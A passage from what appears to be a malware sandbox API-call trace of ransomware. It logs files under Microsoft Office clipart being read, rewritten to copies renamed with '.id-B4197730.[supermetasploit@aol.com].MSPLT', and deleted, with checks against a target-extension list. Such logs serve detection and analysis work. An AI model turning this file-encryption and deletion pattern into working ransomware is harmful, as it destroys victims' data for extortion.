lpNumberOfBytesRead=0x298fecc*=0x17ac, lpOverlapped=0x0) returned 1 [0294.048] WriteFile (in: hFile=0x434, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x17b0, lpOverlapped=0x0) returned 1 [0294.050] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.050] WriteFile (in: hFile=0x434, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.050] SetEndOfFile (hFile=0x434) returned 1 [0294.050] CloseHandle (hObject=0x434) returned 1 [0294.052] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.052] SetEndOfFile (hFile=0x46c) returned 1 [0294.056] CloseHandle (hObject=0x46c) returned 1 [0294.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0294.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.057] lstrlenW (lpString=".doc") returned 4 [0294.058] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString=".docx") returned 5 [0294.058] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.058] lstrlenW (lpString=".pdf") returned 4 [0294.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString=".xls") returned 4 [0294.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.058] lstrlenW (lpString=".xlsx") returned 5 [0294.058] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.058] lstrlenW (lpString=".ppt") returned 4 [0294.058] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.058] lstrlenW (lpString=".zip") returned 4 [0294.058] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.058] lstrlenW (lpString=".rar") returned 4 [0294.058] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString=".bz2") returned 4 [0294.058] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString=".7z") returned 3 [0294.058] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.058] lstrlenW (lpString=".dbf") returned 4 [0294.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.058] lstrlenW (lpString=".1cd") returned 4 [0294.058] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.059] lstrlenW (lpString=".jpg") returned 4 [0294.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.059] lstrlenW (lpString=".doc") returned 4 [0294.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString=".docx") returned 5 [0294.059] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.059] lstrlenW (lpString=".pdf") returned 4 [0294.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString=".xls") returned 4 [0294.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.059] lstrlenW (lpString=".xlsx") returned 5 [0294.059] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.059] lstrlenW (lpString=".ppt") returned 4 [0294.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.059] lstrlenW (lpString=".zip") returned 4 [0294.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.059] lstrlenW (lpString=".rar") returned 4 [0294.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString=".bz2") returned 4 [0294.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.059] lstrlenW (lpString=".7z") returned 3 [0294.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.060] lstrlenW (lpString=".dbf") returned 4 [0294.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.060] lstrlenW (lpString=".1cd") returned 4 [0294.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 68 [0294.060] lstrlenW (lpString=".jpg") returned 4 [0294.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.060] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.060] lstrlenW (lpString="AN04134_.WMF") returned 12 [0294.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.061] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3416) returned 1 [0294.061] CloseHandle (hObject=0x46c) returned 1 [0294.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf")) returned 0x220 [0294.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.063] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.063] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0294.064] GetLastError () returned 0x0 [0294.064] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xd58, lpOverlapped=0x0) returned 1 [0294.068] WriteFile (in: hFile=0x434, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xd60, lpOverlapped=0x0) returned 1 [0294.069] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.069] WriteFile (in: hFile=0x434, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.069] SetEndOfFile (hFile=0x434) returned 1 [0294.069] CloseHandle (hObject=0x434) returned 1 [0294.072] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.072] SetEndOfFile (hFile=0x46c) returned 1 [0294.077] CloseHandle (hObject=0x46c) returned 1 [0294.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0294.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.080] lstrlenW (lpString=".doc") returned 4 [0294.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString=".docx") returned 5 [0294.080] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.080] lstrlenW (lpString=".pdf") returned 4 [0294.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString=".xls") returned 4 [0294.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.080] lstrlenW (lpString=".xlsx") returned 5 [0294.080] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.080] lstrlenW (lpString=".ppt") returned 4 [0294.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.080] lstrlenW (lpString=".zip") returned 4 [0294.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.080] lstrlenW (lpString=".rar") returned 4 [0294.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString=".bz2") returned 4 [0294.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString=".7z") returned 3 [0294.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.080] lstrlenW (lpString=".dbf") returned 4 [0294.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.080] lstrlenW (lpString=".1cd") returned 4 [0294.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.081] lstrlenW (lpString=".jpg") returned 4 [0294.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.081] lstrlenW (lpString=".doc") returned 4 [0294.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString=".docx") returned 5 [0294.081] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.081] lstrlenW (lpString=".pdf") returned 4 [0294.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString=".xls") returned 4 [0294.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.081] lstrlenW (lpString=".xlsx") returned 5 [0294.081] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.081] lstrlenW (lpString=".ppt") returned 4 [0294.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.081] lstrlenW (lpString=".zip") returned 4 [0294.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.081] lstrlenW (lpString=".rar") returned 4 [0294.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString=".bz2") returned 4 [0294.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.081] lstrlenW (lpString=".7z") returned 3 [0294.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.082] lstrlenW (lpString=".dbf") returned 4 [0294.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.082] lstrlenW (lpString=".1cd") returned 4 [0294.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 68 [0294.082] lstrlenW (lpString=".jpg") returned 4 [0294.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.082] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.082] lstrlenW (lpString="AN04174_.WMF") returned 12 [0294.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.083] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2636) returned 1 [0294.083] CloseHandle (hObject=0x46c) returned 1 [0294.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf")) returned 0x220 [0294.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.084] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.084] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0294.085] GetLastError () returned 0x0 [0294.085] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xa4c, lpOverlapped=0x0) returned 1 [0294.401] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xa50, lpOverlapped=0x0) returned 1 [0294.402] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.403] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.403] SetEndOfFile (hFile=0x470) returned 1 [0294.521] CloseHandle (hObject=0x470) returned 1 [0294.868] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.868] SetEndOfFile (hFile=0x46c) returned 1 [0294.872] CloseHandle (hObject=0x46c) returned 1 [0294.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.873] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0294.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.874] lstrlenW (lpString=".doc") returned 4 [0294.874] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.874] lstrlenW (lpString=".docx") returned 5 [0294.874] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.874] lstrlenW (lpString=".pdf") returned 4 [0294.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.874] lstrlenW (lpString=".xls") returned 4 [0294.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.874] lstrlenW (lpString=".xlsx") returned 5 [0294.874] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.874] lstrlenW (lpString=".ppt") returned 4 [0294.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.874] lstrlenW (lpString=".zip") returned 4 [0294.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.874] lstrlenW (lpString=".rar") returned 4 [0294.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.874] lstrlenW (lpString=".bz2") returned 4 [0294.875] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString=".7z") returned 3 [0294.875] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.875] lstrlenW (lpString=".dbf") returned 4 [0294.875] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.875] lstrlenW (lpString=".1cd") returned 4 [0294.875] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.875] lstrlenW (lpString=".jpg") returned 4 [0294.875] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.875] lstrlenW (lpString=".doc") returned 4 [0294.875] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString=".docx") returned 5 [0294.875] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.875] lstrlenW (lpString=".pdf") returned 4 [0294.875] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.875] lstrlenW (lpString=".xls") returned 4 [0294.875] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.875] lstrlenW (lpString=".xlsx") returned 5 [0294.875] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.875] lstrlenW (lpString=".ppt") returned 4 [0294.876] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.876] lstrlenW (lpString=".zip") returned 4 [0294.876] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.876] lstrlenW (lpString=".rar") returned 4 [0294.876] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.876] lstrlenW (lpString=".bz2") returned 4 [0294.876] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.876] lstrlenW (lpString=".7z") returned 3 [0294.876] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.876] lstrlenW (lpString=".dbf") returned 4 [0294.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.876] lstrlenW (lpString=".1cd") returned 4 [0294.876] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0294.876] lstrlenW (lpString=".jpg") returned 4 [0294.876] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.876] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.876] lstrlenW (lpString="AN04267_.WMF") returned 12 [0294.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.877] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=7804) returned 1 [0294.877] CloseHandle (hObject=0x46c) returned 1 [0294.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf")) returned 0x220 [0294.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.878] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.878] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0294.879] GetLastError () returned 0x0 [0294.879] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x1e7c, lpOverlapped=0x0) returned 1 [0294.882] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x1e80, lpOverlapped=0x0) returned 1 [0294.884] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 